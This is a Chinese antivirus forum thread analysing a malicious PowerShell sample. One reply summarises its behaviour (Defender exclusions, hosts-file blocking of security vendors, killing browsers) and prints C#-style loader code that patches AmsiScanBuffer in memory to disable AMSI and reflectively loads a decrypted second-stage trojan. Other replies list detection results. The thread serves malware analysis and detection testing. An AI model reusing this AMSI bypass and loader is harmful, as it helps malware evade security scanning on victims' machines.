12
返回列表 发新帖
楼主: xiaozhu009
收起左侧

[病毒样本] ps1

[复制链接]
图钉鱼
发表于 3 天前 | 显示全部楼层
本帖最后由 图钉鱼 于 2025-7-7 16:26 编辑

添加Windows Defender排除项,下载同伙运行,
修改系统 hosts 文件,屏蔽 ​100+ 个安全厂商域名/IP,
强制关闭主流浏览器进程(阻止用户浏览器求助或访问安全网站下载杀毒),
解密运行一个内存马~禁用AMSI功能后从脚本解析出一个Kryptik木马运行,除火绒外基本都可以查杀这个木马VirusTotal - File - ef30059583a58856fe4bfee6476e0ad6402462bd10c6bb27eda202fc9cc27e92

这个马又会下载另一个木马,套娃样本报告-微步在线云沙箱,新样本可以新开一贴了
内存马代码如下:
  1. public class Loader
  2. {
  3.     [DllImport("kernel32.dll")]
  4.     private static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
  5.    
  6.     [DllImport("kernel32.dll")]
  7.     private static extern IntPtr LoadLibrary(string dllName);
  8.    
  9.     public static void Main()
  10.     {
  11.         
  12.         IntPtr hMod = LoadLibrary("amsi.dll");
  13.         IntPtr asbAddr = GetProcAddress(hMod, "AmsiScanBuffer");
  14.         
  15.         // AMSI内存禁用
  16.         PatchMemory(asbAddr, new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 });
  17.         
  18.         // 从资源加载load(在脚本最后的编码中)
  19.         byte[] stage2 = ExtractResource("encrypted.bin");
  20.         Assembly.Load(Decrypt(stage2)).EntryPoint.Invoke(null, null);
  21.     }
  22.    
  23.     private static void PatchMemory(IntPtr address, byte[] patch)
  24.     {
  25.       
  26.         VirtualProtect(address, (uint)patch.Length,
  27.             0x40 /* PAGE_EXECUTE_READWRITE */, out uint oldProtect);
  28.         
  29.         // 写入
  30.         Marshal.Copy(patch, 0, address, patch.Length);
  31.         
  32.         
  33.         VirtualProtect(address, (uint)patch.Length, oldProtect, out _);
  34.     }
  35. }
复制代码











本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
846472713
发表于 3 天前 | 显示全部楼层
ESET未报
心醉咖啡
发表于 3 天前 | 显示全部楼层
火绒7.6库扫描miss
hansyu
发表于 3 天前 | 显示全部楼层
ESET LiveGuard 特洛伊木马
biue
发表于 前天 00:01 | 显示全部楼层
腾讯电脑管家 不报
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-7-10 09:34 , Processed in 0.123320 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表